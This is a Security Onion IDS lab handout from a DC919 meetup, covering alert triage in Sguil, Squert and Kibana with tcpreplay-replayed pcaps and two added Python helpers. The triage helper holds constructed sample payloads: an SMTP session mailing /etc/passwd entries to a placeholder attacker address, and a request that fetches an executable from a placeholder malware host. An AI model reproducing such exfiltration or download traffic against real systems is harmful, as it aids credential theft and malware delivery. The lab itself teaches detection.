DC919 | March 2019 | IDS/IPS Intro Lab Exercises

Author: wavelength ( @__wavelength__ )

Introduction

These exercises are meant only as brief introductions to the tools and interfaces available in Security Onion.

Pre-requisites

You should have a Security Onion VM completely set up to proceed. Ideally, you will have a snapshot of the fresh install that you can revert to between exercises.

You should have some familiarity with Linux to be able to complete these exercises. Some step-by-step instructions are provided to familiarize you with Security Onion or to ensure that the exercises work as intended.

Downloads

The following files should be downloaded to your Security Onion:
  https://github.com/wave-length/Presentations/raw/master/MAR19-DC919-SecurityOnion/Files/Ex1-honeynet.org-Scan19.tar.gz
  https://s3.amazonaws.com/tcpreplay-pcap-files/bigFlows.pcap

Exercise 1 - Intro to Sguil

  1. Once you have logged into your VM, open a terminal window by clicking on “Applications”, then “Utilities” and scroll down to and click “Terminal”. Change directory to where you have stored the downloaded Exercise pcaps. If you used the Chromium web browser, those files are stored in the “Downloads” directory.
  2. Extract the files contained in Ex1-honeynet.org-Scan19.tar.gz with the following command:
     mkdir ./Exercise1 && tar -xvzf Ex1-honeynet.org-Scan19.tar.gz --directory ./Exercise1
  3. Change directory into the “Exercise1” directory.
  4. Minimize the terminal window and double-click the “Sguil” icon on the desktop. Log in to Sguil using the credentials that you set up when you built the Security Onion VM; note that these are not the same credentials you use to log in to the system. A new window will appear asking which sensors to monitor. There should be two options: seconion-ossec and seconion-enxxxx (the prefix is the VM's hostname, so it will differ if you did not name yours “seconion”). Ignore the sensor labelled “ossec”; make note of what follows the hyphen on the one starting with “en”. It should be something similar to enp#s#, where the #-signs are numbers. This is the name of the Ethernet interface used for capture and it will be needed later. Click “Select All” once you have noted the interface name and then “Start SGUIL.” The Sguil interface should appear. Make sure that the “RealTime Events” tab is selected and the box under the tab is clear of events. If there are events listed, click one and press F8 to clear it. If there is more than one, keep pressing F8 until they are all cleared.
  5. Bring the terminal back to the foreground. At the command line, enter the following command:
     sudo sleep 15s && sudo tcpreplay -i <Ethernet interface name> -M 100 newdat3.log
     For example, if the name of your capture Ethernet interface is “enp0s8”, the command would be:
     sudo sleep 15s && sudo tcpreplay -i enp0s8 -M 100 newdat3.log
     When you press enter, you will be prompted for the sudo password; use the password used to log in to the VM. The first sudo normally caches your credentials, so the second will not prompt again after the delay; -M 100 replays the capture at 100 Mbps instead of at its original timing. Then switch back to the Sguil screen and wait.
  6. In about fifteen seconds, long enough to switch back to Sguil, tcpreplay will replay the newdat3.log pcap file and events will appear in Sguil. There should be roughly 15 events. Let’s take a look at some of them.
  7. Click on the event with the Event Message of “GPL TELNET Bad Login”. The fields at the bottom of the window should populate. If they do not, make sure that the checkboxes next to “Reverse DNS”, “Enable External DNS”, “Show Packet Data” and “Show Rule” are all checked.
  8. Let’s find out where this failed login attempt possibly originated from… Next to “Whois Query” are three radio buttons; select “Src IP” and wait for the field under it to populate. Scroll down in that field until you see “country:”. What two-letter country code is present? You can use Google to determine which country this is, or, if you scroll down to the “address:” fields, you can find it there. What country is the possible source of this attack? Keep in mind that whois tells you who registered the address block, not where the person using it sits: the source could be a compromised host or a proxy anywhere.
  9. Now that we have determined where the source IP is likely registered, we treat this as an unauthorized access attempt, since nobody we know in that country should be accessing this system. Sguil allows you to classify events based on the results of an investigation. To classify this event, right-click on the “RT” on the left of the row for this event. In the pop-up menu, go to “Update Event Status” and then choose “CAT III - Attempted Unauthorized Access (F3)”. You can also select the event and press F3. The event will now disappear from the “RealTime Events” pane.
  10. The “RealTime Events” view allows you to see events as they are generated by the IDS. As a SOC analyst monitoring an IDS, this is the event queue from which you would pick and investigate events. Now, say you want to look at all of the events that have been classified as “Attempted Unauthorized Access”. To do this, select “Query” from the Sguil menu bar, choose “Query by Category” and then the “CAT III: Attempted Unauthorized Access” query. This opens a query builder screen. With the query builder function, you can query the events catalogued by Security Onion. For this exercise, click the “Submit” button. A new tab with the query results will appear and the event you classified in Step 9 should be displayed. When you are ready to continue, close this tab using the “Close” button in the upper left corner.
  11. Sguil also allows you to perform packet analysis in the same interface. Select the event labelled “ET ATTACK_RESPONSE Possible /etc/passwd via SMTP (linux style)”. The fields at the bottom should populate; if they do not, make sure the checkboxes referenced in Step 7 are checked. Using the blue colour-coded fields on the bottom right of the screen, we can see the header and payload information for the packet, including source and destination IP and port. The “DATA” field is where we want to dig for information on this attack. According to the signature's message, someone attempted to email the contents of the /etc/passwd file to someone. Using the information in the “DATA” field, examine the packet payload and determine the recipient of the file. What is the recipient (TO:) email address? Note that a single packet holds only part of an SMTP session; if the address is not in this packet, right-click the event's Alert ID and choose “Transcript” to see the whole reassembled exchange.

Exercise 2 - Intro to Squert

  1. Minimize the Sguil interface and open the Squert interface by using the icon on the desktop. The login is the same username and password as Sguil. Once logged in, clear all of the alerts in the Squert interface. This is done by clicking on the red square next to an event and then clicking the “No Action Req’d” option on the left side of the window under “Classification”. The classification section of the interface is similar to the classify function in Sguil. We will try this functionality out shortly.
  2. Go back to your terminal once all of the events are cleared in Squert. Change directory to the sample captures shipped with Security Onion by typing ‘cd /opt/samples’. Run tcpreplay, as shown in Exercise 1, to replay bredolab-sample.pcap:
     sudo tcpreplay -i <Ethernet interface name> -M 100 bredolab-sample.pcap
     You will probably be prompted for your sudo password, as in Exercise 1; again, this is the same password you used to log in to the VM.
  3. Once tcpreplay completes, in squert, click the interface refresh button at the top of the screen. It will be two arrows making a circle and may be marked with a red exclamation point. After clicking this icon, at least six alerts should appear in the squert interface; if they do not, wait and click the refresh button again.
  4. Click the alert marked “ET Trojan Tibs/Harnig Downloaded Activity”. Note the information that appears - the IDPS signature, including some links to information and event specific information, such as time, source host and destination host.
  5. Under “Categorize 4 Event(s)”, click the red square with the number four in it. The number is how many times this signature fired, one event per matching packet. Additional rows will appear for each of the captured packets with their capture times. Click the event ID for any one of them. This pivots from Squert to the CapMe interface, where you can examine the contents of the captured session and, if desired, download a pcap from the sensor for offline analysis.
  6. Using the information presented in the CapMe interface, what was the domain from which this Trojan was downloaded? Hint: Look at the lines marked “SRC” (the client's request, including its Host header).
  7. Using the information presented in the CapMe interface, it appears that the webserver sent something back - what? Hint: Look at the lines marked “DST” (the server's response).
  8. It looks like this might be malicious. We have the ability to classify events in Squert, just like Sguil. Close the CapMe tab and go back to the Squert interface. The event for “ET Trojan Tibs/Harnig Downloaded Activity” should still be selected. Make sure “Categorize 4 Event(s)” is still displayed in the event and then click the link on the left labelled “malicious” under “Classification”. If “Categorize 4 Event(s)” instead says “Categorize 0 Event(s)” or another number, click the checkbox under the red square with four in it until “Categorize 4 Event(s)” is displayed and then click the “malicious” category link.
  9. The event we were just looking at will now disappear from the queue. To view it again, click the number four next to “malicious” in the “Classification” section. To view the queue again after trying this, click the “YES” next to “Filtered By Object” near the top right of the interface. Doing this will display all of the events in the system, including categorized events. Click the “OFF” next to “queue only” and then the “refresh” button to restore the queue.
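The analyst work in Exercise 1 step 11 and Exercise 2 steps 6 and 7 comes down to reading a raw payload and pulling out who the data was sent to, which host served a file and what came back. The following is an added example for this lab, not code from Security Onion, Sguil, CapMe or the lab author: a small Python triage routine that does the same reading offline over a payload copied out of Sguil's DATA field or a CapMe transcript. The SMTP and HTTP payloads in it are constructed (placeholder names such as attacker.example), not the contents of the lab pcaps, and the /etc/passwd pattern is this example's own approximation of what the ET signature looks for, not the rule's actual content match.

```python
"""Offline triage of one captured TCP payload, the text you read in Sguil's
DATA field or a CapMe transcript.  Added example for this lab, not Security
Onion code; the payloads at the bottom are constructed, not from the lab pcaps."""
import re
from dataclasses import dataclass, field

# Shape of an /etc/passwd entry (name:pw:uid:gid:gecos:home:shell).  This is an
# approximation of what the ET "Possible /etc/passwd via SMTP" rule keys on,
# written for this example; it is not the rule's actual content match.
PASSWD_LINE = re.compile(r"^[A-Za-z_][\w-]*:[^:\n]*:\d+:\d+:[^:\n]*:/[^:\n]*:[^\n]*$", re.M)


@dataclass
class Triage:
    protocol: str                       # smtp, http-request, http-response, unknown
    fields: dict = field(default_factory=dict)
    findings: list = field(default_factory=list)


def _headers(block: str) -> dict:
    """'Name: value' lines (HTTP or RFC 822 headers) -> lower-cased dict."""
    out = {}
    for line in block.split("\n"):
        name, sep, value = line.partition(":")
        if sep and name and " " not in name.strip():
            out[name.strip().lower()] = value.strip()
    return out

def _triage_smtp(text: str) -> Triage:
    t = Triage("smtp")
    # Envelope addresses come from the client's SMTP commands ...
    t.fields["mail_from"] = re.findall(r"^MAIL FROM:\s*<?([^>\n]+?)>?\s*$", text, re.M | re.I)
    t.fields["rcpt_to"] = re.findall(r"^RCPT TO:\s*<?([^>\n]+?)>?\s*$", text, re.M | re.I)
    # ... and the message itself follows DATA: header block, blank line, body.
    m = re.search(r"^DATA\n(.*?)\n\n(.*)", text, re.M | re.S | re.I)
    if m:
        hdrs, body = _headers(m.group(1)), m.group(2)
        t.fields["header_to"] = hdrs.get("to")
        t.fields["subject"] = hdrs.get("subject")
        hits = PASSWD_LINE.findall(body)
        if hits:
            t.findings.append(f"/etc/passwd-style content: {len(hits)} account lines, first {hits[0]!r}")
    return t

def _triage_http_request(text: str) -> Triage:
    t = Triage("http-request")
    request_line, _, rest = text.partition("\n")
    method, path = (request_line.split() + ["", ""])[:2]
    hdrs = _headers(rest.split("\n\n", 1)[0])
    host = hdrs.get("host", "")
    t.fields.update(method=method, path=path, host=host,
                    url=f"http://{host}{path}" if host else path,
                    user_agent=hdrs.get("user-agent"))
    if re.search(r"\.(exe|scr|dll|jar)(\?|$)", path, re.I):
        t.findings.append(f"request for an executable: {path}")
    return t

def _triage_http_response(text: str) -> Triage:
    t = Triage("http-response")
    status_line, _, rest = text.partition("\n")
    head, _, body = rest.partition("\n\n")
    hdrs = _headers(head)
    t.fields.update(status=status_line.strip(), content_type=hdrs.get("content-type"),
                    content_length=hdrs.get("content-length"))
    if body.startswith("MZ"):                  # DOS/PE header: an executable came back
        t.findings.append("body starts with 'MZ': the server returned a Windows executable")
    return t

def triage_payload(payload: bytes) -> Triage:
    """Pick the protocol from the first line and extract what an analyst asks for."""
    text = payload.decode("latin-1").replace("\r\n", "\n")   # latin-1 maps every byte
    first = text.split("\n", 1)[0]
    if re.match(r"(GET|POST|HEAD) \S+ HTTP/\d", first):
        return _triage_http_request(text)
    if first.startswith("HTTP/"):
        return _triage_http_response(text)
    if re.search(r"^(EHLO|HELO|MAIL FROM:|RCPT TO:)", text, re.M | re.I):
        return _triage_smtp(text)
    return Triage("unknown")


# Constructed sample payloads (client side of an SMTP exfil, an HTTP download
# request and the start of its response); the names are placeholders.
SMTP_EXFIL = (b"HELO victim.example\r\nMAIL FROM:<root@victim.example>\r\n"
              b"RCPT TO:<dropbox@attacker.example>\r\nDATA\r\n"
              b"From: root@victim.example\r\nTo: dropbox@attacker.example\r\n"
              b"Subject: passwd\r\n\r\n"
              b"root:x:0:0:root:/root:/bin/bash\r\n"
              b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\r\n.\r\nQUIT\r\n")
HTTP_GET = (b"GET /load/update.exe HTTP/1.1\r\nHost: dl.malware-host.example\r\n"
            b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n")
HTTP_RESP = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
             b"Content-Length: 24576\r\n\r\nMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff")

if __name__ == "__main__":
    for sample in (SMTP_EXFIL, HTTP_GET, HTTP_RESP):
        print(triage_payload(sample))
```

Feed the bytes of a real payload to triage_payload() to get the envelope recipients, the To: header and the requested URL at a glance. For a multi-packet session use the CapMe transcript rather than one packet from Sguil, since a single packet may hold only the RCPT TO line or only the body.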

Exercise 3 - Intro to Kibana

  1. This exercise will require a lot of data, so we will be using the bigFlows.pcap provided by the author of tcpreplay. Replay this pcap the same way we replayed the pcaps in Exercises 1 and 2, from the directory you downloaded it to:
     sudo tcpreplay -i <Ethernet interface name> -M 100 bigFlows.pcap
  2. This pcap will take a minute or two to replay into Security Onion and be analyzed. While that is happening, you can minimize the terminal window and open Kibana using the link on your Security Onion desktop. If you are prompted to log in, it is the same credentials used for Sguil and Squert.
  3. Check that the replay has completed by looking in the terminal window for tcpreplay's statistics: the numbers of packets “Attempted” and “Successful” should both be 791,615. If the actual numbers differ slightly, that is OK. If “Failed” is non-zero or “Successful” falls well short of “Attempted”, the VM could not keep up with the replay rate; rerun with a lower -M value (for example -M 10).
  4. Go back to the Kibana interface and click on the “Dashboard” item in the left menu. The Dashboard screen will appear in the content pane, providing information on the types of traffic and events processed by Security Onion. Click on the “HTTP” option in the “Bro Hunting” menu in the grey content pane. Once the pane updates, scroll through the content that is presented. You can see information like the countries that hosts are communicating with, the types of content that are loaded, the domains that are contacted and user-agent strings. This information is generated by the Bro (now Zeek) engine running on the Security Onion system.
  5. Let’s try another data view. Scroll back to the top of the content pane and click “NIDS” under “Alert Data”. When the pane updates, take a look around. You will be able to see information like the type of alert, source and destination IPs, source and destination ports, countries contacted and frequency data.
  6. Click on “Bro Notices” under “Alert Data”. There should be some notices for expired SSL certificates. This illustrates the power of Bro: it inspects not only SSL certificates but other protocol and client details, such as user-agent strings, to glean intelligence about the environment without needing a signature for each case.
  7. Now let’s take a look at the data visualization capabilities of Kibana. Click on the “Visualize” item in the left hand menu. From the list of visualizations, select “Bro - Connections - Service By Destination Country”. The content pane will update with a visual graph of the countries contacted and graphs showing how often destination ports were contacted.
  8. Click on the “Visualize” item in the left hand menu again. In the search field in the content pane, type “Map” and from the results select “Connections - Destination - Sum of Total Bytes (Tile Map)”. The content pane will update and display a map with circles in various locations. The circles are placed at the approximate, GeoIP-derived locations of the hosts that were the destinations of packets seen on the network. The size and colour of the circles reflect the amount of data sent to those hosts.
  9. Kibana, its query language and its capabilities encompass such a large body of information that there are entire books and classes on it. Feel free to poke around and try out the different visualizations or a few queries. Kibana only reads from the Elasticsearch indices, so browsing and querying cannot corrupt or delete the underlying event data.
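Every exercise starts the same way: find the sniffing interface that Sguil names after the hyphen, replay a pcap into it with tcpreplay, then confirm in the terminal that “Attempted” and “Successful” agree (Exercise 1 steps 4 to 6, Exercise 3 step 3). The script below is an added example for this lab, not part of Security Onion or tcpreplay: it wraps that procedure in Python, validates the interface name, runs tcpreplay via sudo and parses its statistics so the check is mechanical. The sample tcpreplay summary it parses is constructed (the labels follow the “Attempted”/“Successful” output the lab describes, with the bigFlows.pcap count the lab quotes); if your tcpreplay build prints the counters under different labels, adjust STAT_LINE.

```python
"""Replay a pcap into the Security Onion sniffing interface and confirm that
tcpreplay delivered every packet.  Added example for this lab; not part of
Security Onion or tcpreplay.  SAMPLE_OUTPUT is constructed, not real output."""
import re
import shutil
import subprocess
import sys
from pathlib import Path

IFACE_OK = re.compile(r"^[A-Za-z0-9_.:-]{1,15}$")   # Linux IFNAMSIZ is 16 incl. NUL
STAT_LINE = re.compile(r"^\s*(Attempted|Successful|Failed) packets:\s+(\d+)", re.M)
ACTUAL_LINE = re.compile(r"^Actual:\s+(\d+) packets", re.M)


def iface_from_sensor(sensor: str):
    """'seconion-enp0s8' -> 'enp0s8'.  Sguil lists sensors as hostname-interface;
    the hostname may itself contain hyphens, so split on the last one.  The
    '<host>-ossec' pseudo-sensor carries host logs, not packets: return None."""
    host, sep, iface = sensor.rpartition("-")
    if not sep or not host or iface == "ossec":
        return None
    return iface


def build_replay_cmd(iface: str, pcap, mbps: int = 100) -> list:
    """The argv the lab has you type, with the interface name checked first so a
    typo cannot turn into a stray argument to tcpreplay."""
    if not IFACE_OK.match(iface):
        raise ValueError(f"not a plausible interface name: {iface!r}")
    return ["sudo", "tcpreplay", "-i", iface, "-M", str(mbps), str(pcap)]


def parse_tcpreplay_stats(output: str) -> dict:
    """Pull the per-device counters out of tcpreplay's end-of-run summary."""
    stats = {name.lower(): int(n) for name, n in STAT_LINE.findall(output)}
    m = ACTUAL_LINE.search(output)
    if m:
        stats["actual"] = int(m.group(1))
    return stats


def replay_delivered(stats: dict, expected: int = None) -> bool:
    """True when every packet tcpreplay tried went onto the wire.  'attempted' is
    the lab's check; fall back to the 'Actual:' count if that line is absent."""
    attempted = stats.get("attempted", stats.get("actual"))
    successful = stats.get("successful")
    if attempted is None or successful is None:
        return False
    if expected is not None and attempted != expected:
        return False
    return successful == attempted and stats.get("failed", 0) == 0


def replay(iface: str, pcap, mbps: int = 100):
    """Run tcpreplay (sudo prompts on the terminal) and return (rc, stats)."""
    pcap = Path(pcap)
    if not pcap.is_file():
        raise FileNotFoundError(pcap)
    if shutil.which("tcpreplay") is None:
        raise RuntimeError("tcpreplay is not installed")
    proc = subprocess.run(build_replay_cmd(iface, pcap, mbps),
                          capture_output=True, text=True)
    return proc.returncode, parse_tcpreplay_stats(proc.stdout + proc.stderr)


# Constructed summary in the shape the lab describes ("Attempted"/"Successful"),
# using the bigFlows.pcap packet count the lab quotes (791,615); not real output.
SAMPLE_OUTPUT = """\
Actual: 791615 packets (355417784 bytes) sent in 11.30 seconds
Rated: 31452902.1 bps, 239.97 Mbps, 70055.31 pps
Statistics for network device: enp0s8
\tAttempted packets:         791615
\tSuccessful packets:        791615
\tFailed packets:            0
\tRetried packets (ENOBUFS): 0
\tRetried packets (EAGAIN):  0
"""


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <sensor name or interface> <pcap>")
    name, pcap = sys.argv[1:]
    iface = iface_from_sensor(name) if "-" in name else name
    if iface is None:
        sys.exit(f"{name} is not a packet sensor")
    rc, stats = replay(iface, pcap)
    print(stats)
    sys.exit(0 if rc == 0 and replay_delivered(stats) else 1)
```

Run it as `python3 replay.py seconion-enp0s8 bigFlows.pcap`: the exit status is zero only when tcpreplay exited cleanly and its own counters show nothing dropped, which is the same check the lab asks you to make by eye.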

Play around on your own…

Now that you have the basics, feel free to try replaying other pcap files and see what you get. There are many freely downloadable pcap files out there. One such list can be found at https://www.netresec.com/?page=pcapfiles, or try out some of the other files in the /opt/samples directory of your Security Onion installation.

You can also take a look through the Security Onion documentation at https://securityonion.readthedocs.io/en/latest/